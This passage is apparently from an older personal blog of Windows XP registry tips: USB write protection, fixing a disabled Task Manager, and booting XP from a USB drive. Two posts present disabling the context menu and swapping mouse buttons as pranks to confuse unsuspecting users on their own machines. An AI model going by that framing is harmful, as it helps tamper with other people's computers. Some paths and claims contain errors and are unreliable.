Browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Locate the sub-key StorageDevicePolicies. If it doesn't exist then create it first. Create a new key under Control by right clicking on it so that you don't create it elsewhere by mistake (as shown in the above screenshot).
Right click in the blank area of the sub key you just created and create a new DWORD value by the name WriteProtect.

usb_write_protect_3

Double-click it and set the value data as 1 (and 0 for disabling it).
Click OK, close the Registry Editor and restart the PC.

The drawback of this trick is that you need to remember this trick by yourself and you need to restart the PC after applying this trick. Killing explorer.exe and restarting it will not do the job everytime. I am still looking for any other ways fo protecting your drives and I will post in on my blog if I found a better trick than this one. Share your thoughts in the comment.

8:09 PM | Add a comment | Permalink | Blog it | Computers and Internet

How to reverse the mouse buttons

1) No context menu

What will you see when you right click on the desktop? You will see a context menu which says arrange icons, refresh,..and so on. Are you angry at your friend for not wishing you for you B'day? Do you wanna play a trick on a newbie in your family who is new to computers? This is a cool trick to play. By this tweak, you will be able to disable the right click on the desktop or any icons/files/folders/applications… But right click will work on taskbar of the start button and registry. So, dont worry!!!
Open your registry and you will see all unknown files like HKEY_CLASSES_ROOT……. and so on. Don't panic. Follow this path. HKEY_CURRENT_USER>SOFTWARE>MICROSOFT>WINDOWS>CURRENT VERSION>POLICIES>EXPLORER. On the right side of the registry, you will see two files(in general) named 'default' and 'NoDriveTypeAutoRun'. Right click on the empty space in the registry and goto New>DWORD VALUE and name it as "NoViewContextMenu". Remember, no spaces and N,V,C,M should be capitals. Right click on this and click modify. The default value will be 0. Change it to 1. Note: DONOT CHANGE THE HEXADECIMAL TO DECIMAL. Click OK. Close your registry and logout. Bingo!!! Once you login again, right click wont work. Your friend will be perplexed and the next thing he/she does is call the system administrator not knowing that not all system administrators will be knowing about registry. Now, to enable it again. follow the same path and set the value to 0. Logout and then login to see the effect.

2) Reverse the mouse buttons
This is a cool trick to play on newbies. Actually, there are two ways to do this. One is changing the settings in the Control panel and the other is through editing registry. You can do it either way. But I prefer the second way, which is challenging.
(i) Through Control Panel - goto Start> Control Panel> Printers and other hardware> Mouse. In Button configuration, enable the switch primary and secondary buttons option and click OK. But remember, you have just swapped the mouse buttons. So, for OK, you have to click the right mouse button. The newbie will be perplexed. Well, this trick is good for left handers.
(ii) Editing the registry - By default the left mouse button is the primary and the right is secondary. Open your registry and follow this path:
HLEY_CURRENT_USER>Control Panel>Mouse and on the right side of the registry, create this String value(REG_SZ): 'SwapMouseButtons' and set its value to 1. Bingo!!! You are done. Log out/Restart the computer.

You can try this: Combine tricks 1 and 2. That means, this will result in swapping of the mouse buttons and disabling the left click(once the buttons are swapped). User is ready to call system administrator cuz he feels that the system is behaving wildly.

8:04 PM | Add a comment | Permalink | Blog it | Computers and Internet

Why is Task Manager Disabled?

Some time ago I received an email from a reader curious why their Task Manager option was grayed out on the taskbar right-click menu. After a bit of research his problem was solved, and now I'm sharing the solution with everybody.

There is a registry key that will disable Task Manager, although it's not always clear how or why it was set to disable. In many cases the problem is related to spyware, so you should also scan your computer.

Why is task manager grayed out?

Manual Registry Hack

Open up regedit.exe through the start menu search or run box, and then navigate down to the following key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

On the right-hand side is a 32-bit REG_DWORD value named DisableTaskMgr with one of two values:

1 - Disable task manager
0 - Enable task manager

8:01 PM | Add a comment | Permalink | Blog it | Computers and Internet

9/3/2008

Booting XP from a USB drive.

First of all we need is a USB flash drive with a capacity of at least of 512MB.Now we have to format the drive using the FAT 32 or FAT 16 depending on the configuration of the BIOS. Then enter a name for the volume label. Then copy the boot.iniand NTDETECT.COM files from the windows directory to the flash drive.
Second step is to create a folder and insert your windows setup CD into the drive and copy whole CD into the new folder. In order to produce an exact copy of windows XP we need a utility called “NLite”.We need to install .NET Framework to install NLite. Now run NLite and select the new folder we have created in the second step as the root folder and click on “Next “after it completes reading the folder until we reach “Task Selection”. Activate the options for Service Pack and hot fixes.Inorder to reduce the file size remove all “unnecessary” files which is highlighted as safe for deletion.NLite just creates a minimized copy of XP. In order to create a bootable version of XP we need another tool called “Bart’s PE”. After installing Bart’s PE run “PEBuilder” and make sure that USB flash drive is plugged in and select the folder we have created in the second step as the source and deactivate the “Create Iso” and “Burn to CD option”. Click on the build option as windows is ready to boot from a USB flash drive.
Note: To include some useful tools like Firefox then follow these steps. First of all download the plug-in for the utility you want to install and copy it to the Plug-in folder of your Bart’s PE Installation. There are plug-in for other applications too. Just activate the plug-in for the tools you want to install. Read the help file associated with each plug-in which describes how to install that plug-in.

1:56 PM | Add a comment | Permalink | Blog it | Computers and Internet